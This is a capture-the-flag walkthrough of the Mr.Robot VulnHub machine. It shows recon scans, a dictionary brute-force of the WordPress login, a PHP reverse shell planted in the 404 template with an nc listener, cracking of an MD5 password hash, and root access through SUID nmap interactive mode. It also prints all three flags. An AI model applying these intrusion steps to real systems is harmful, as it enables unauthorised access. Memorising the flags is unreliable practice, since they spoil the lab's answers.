Mister Robot
Hacking For RamenIn this writeup, I will cover an awesome machine from the VulnHub - Mr.Robot.
There is also a version of that machine on TryHackMe!
Description:
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
Table of content:
- Information Gathering
- Brute force
- Exploitation
- Privilege escalation
- Conclusion
Information gathering
The machine itself distributed inside of VM container as a .ova file. You will see the login screen, but the author not mentioned credentials in a description. Let's look around and scan the network:
netdiscover -i eth0 -r 192.168.159.0/24
My Kali host has the IP 192.168.159.128 and Mr.Robot machine has 192.168.159.129.
Scanning open ports on Mr.Robot machine:
root@kali:~# nmap -sV 192.168.159.129 PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 443/tcp open ssl/http Apache httpd
Opening the IP in a browser, yeah, it is stylized for Mr.Robot TV series website. Fancy, but useless.
Scanning this IP with Nikto:
root@kali:~# nikto -h 192.168.159.128 + Server: Apache + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type + Retrieved x-powered-by header: PHP/5.5.29 + No CGI Directories found (use '-C all' to force check all possible dirs) + Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. + OSVDB-3092: /admin/: This might be interesting... + Uncommon header 'link' found, with contents: ; rel=shortlink + /readme.html: This WordPress file reveals the installed version. + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /admin/index.html: Admin login page/section found. + Cookie wordpress_test_cookie created without the httponly flag + /wp-login/: Admin login page/section found. + /wordpress/: A WordPress installation was found. + /wp-admin/wp-login.php: WordPress login found + /blog/wp-login.php: WordPress login found + /wp-login.php: WordPress login found
Checking the findings I have discovered few interesting pages as /readme.html, /license.txt, /wp-login.php and /robots.txt.
Let's start from the /robots.txt:
User-agent: * fsocity.dic key-1-of-3.txt
Let's open this path in a browser or simple WGET it from the terminal:
073403c8a58a1f80d943455fb30724b9
Hooray! We have found the easiest flag. Moving forward.
Let's have a look on the fsocity.dic file. Looks like a wordlist:
root@kali:~# head fsocity.dic true false wikia from the now Wikia extensions scss window
This wordlist contains a lot of duplicates, we need to remove them to speed up the process of brute force attack.
cat fsocity.dic | sort -u | uniq > newfsocity.dic
Now the list contains only 11k words instead of 800k+, it will save a lot of time.
The page */wp-login.php* looks like the right place applies this list.
According to the *readme.html* the system is running WordPress Version 4.3.9
Brute force
Burp suite
There are plenty of tools designed for brute force attack, I will slightly cover a few of them as a bonus.
During my walkthrough, I used TurboIntruder for the Burp Suite. Incredible fast way to get into the web application.
Just intercept the login command in Burp, double-click on the password and choose "Send to turbo intruder".
In this case the value of the password will be automatically replaced by %s symbol and the tool will do the rest.
POST /wp-login.php HTTP/1.1 Host: 192.168.159.129 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.159.129/wp-login.php?loggedout=true Content-Type: application/x-www-form-urlencoded Content-Length: 108 Cookie: s_fid=0F6464DBC5078D64-2082C0564C7815D5; s_nr=1571217063697; wp-settings-6=libraryContent%3Dbrowse; wp-settings-time-6=1571317217; s_cc=true; s_sq=%5B%5BB%5D%5D; wordpress_test_cookie=WP+Cookie+check Connection: close Upgrade-Insecure-Requests: 1 log=elliot&pwd=%s&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.159.129%2Fwp-admin%2F&testcookie=1
As the whole machine has a "Mr.Robot flavor", my first guess was to try "Elliot" as a username.
After a tuning a turbo intruder a bit I had a password in my hand:
ER28-0652
WPScan
As is this machine we are working with WordPress, it's a good idea to use some tools designed exactly for it.
WPScan is a free black box WordPress vulnerability scanner already preinstalled in Kali.
Firing it up and take a coffee break, it will take a while.
root@kali:~# wpscan --url 192.168.159.129 --wordlist ./newfsocity.dic --username elliot --- [+] [SUCCESS] Login : elliot Password : ER28-0652 +----+--------+------+-----------+ | Id | Login | Name | Password | +----+--------+------+-----------+ | | elliot | | ER28-0652 | +----+--------+------+-----------+
We already have admin credentials, but let's also check possible vulnerability's here:
root@kali:~# wpscan -u 192.168.159.129 -e vp
We will have a huge list of possible Cross-Site Scripting, but nothing that will help us exploit the system even more.
Bonus
Let's have a look at the /license.txt:
What you do just pull code from Rapid9 or some s@#% since when did you become a script kitty? do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo=
Huh, interesting. Looks like a password encoded in base64:
root@kali:~# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 --decode elliot:ER28-0652
Perfect! You don't need to even brute force anything if the information gathering stage was done properly.
Using these credentials we can log in into the admin panel at /wp-login page.
Exploitation
From that point there are a lot of attack vectors, for example, you can craft malicious plugin and install it, or get the data from the database,
We will follow the probably the easiest way - RCE
An example of PHP reverse shell can be found of PentestMonkey, for example.
From the admin panel in /wp-admin page we can edit any template files, the first in a list is "404 Template", so we will use that.
Just put the code from PentestMonkey's to the editor and tweak IP and port to yours.
On your host open the terminal and set up a listener to catch the shell when it will be triggered:
root@kali:~# nc -lvp 1337 listening on [any] 1337 ...
Open a 404.php page in a browser or trigger it by curl from your terminal:
root@kali:~# curl http://192.168.159.129/404.php
If the IP and port were set up properly, you will have a response in a terminal:
$ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $ whoami daemon $ hostname linux
Hooray! You are in. Look around and open */home/robot* folder:
root@kali:~# cd /home/robot
There are two files there, key-2-of-3.txt and password.raw-md5.
To be able to login to the robot session we heed to have a TTY shell.
python -c 'import pty; pty.spawn("/bin/sh")'
The second flag is very close, but you have a shell as daemon user, who don't have the access to this file.
Luckily you have a hash of the password nearby, open any tool for decoding MD5, for example MD5Online, and decode it:
Found : abcdefghijklmnopqrstuvwxyz (hash = c3fcd3d76192e4007dfb496cca67e13b)
Going back to the terminal with the reverse shell in it:
$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami whoami robot
Now we are logged in as a robot user and we can open key-2-of-3.txt:
$ cat key-2-of-3.txt 822c73956184f694993bede3eb39f959
The second key is
822c73956184f694993bede3eb39f959
Let's try to get the root! We will need to do a [privilege escalation](https://en.wikipedia.org/wiki/Privilege_escalation) for that.
First of all, we will check for any files that have the SUID set files:
$ find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown
Interesting, the nmap is installed. Checking for a version:
robot@linux:/$ /usr/local/bin/nmap --version /usr/local/bin/nmap --version nmap version 3.81 ( http://www.insecure.org/nmap/ )
The old version of nmap will allow you to use "interactive" mode. In this mode, you can execute the commands from nmap's shell.
The moment of truth:
$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh # id id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot) # cd /root cd /root # cat key-3-of-3.txt cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
```
Well done, we have the last flag now:
04787ddef27c3dee1ee161b21670b4e4
Conclusion
It was a robust entry-level machine with classic exploitation flow. Recommending it for beginners, there are at least a few good learning points if you are not very experienced yet.